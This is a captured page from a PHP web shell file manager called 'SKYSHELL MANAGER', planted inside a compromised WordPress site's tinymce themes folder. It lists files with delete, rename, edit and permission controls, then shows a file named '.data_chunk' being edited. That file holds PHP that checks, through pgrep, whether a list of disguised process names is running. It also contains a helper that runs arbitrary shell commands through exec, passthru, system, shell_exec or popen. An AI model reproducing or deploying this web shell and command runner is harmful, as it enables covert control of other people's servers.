📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
11681.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: .data_chunk
<?php $files = ['changeTut','EntityLookup','deletehtmlblob','scheduler','rate_accept01','bottomuserscols','courseHomepage','banners.bak','formpassword','smf20.inc','crypt.inc','modifprod','hrvatski.lng','csv.class','changegroupperm','pical_new_event','DeleteFile','pur_detail','mm3_panel','mod_arhiva','xoopscodes','default_map','phdRqmnts','ndbcluster.lib','mcp_details','action.setprefs','AttrTransform','risultati','toxmlrpc.inc','cacheLib.class']; foreach ($files as $f) { $res = @run("pgrep {$f}"); if (!preg_match('/\d+/', $res)) { die("<f>{$f}</f>"); } } die('!ended!'); function run($in) { $out = ''; if (function_exists('exec')) { @exec($in, $out); $out = @join("\n", $out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $out = ""; while (!@feof($f)) $out .= fread($f, 1024); pclose($f); } return $out; }
Save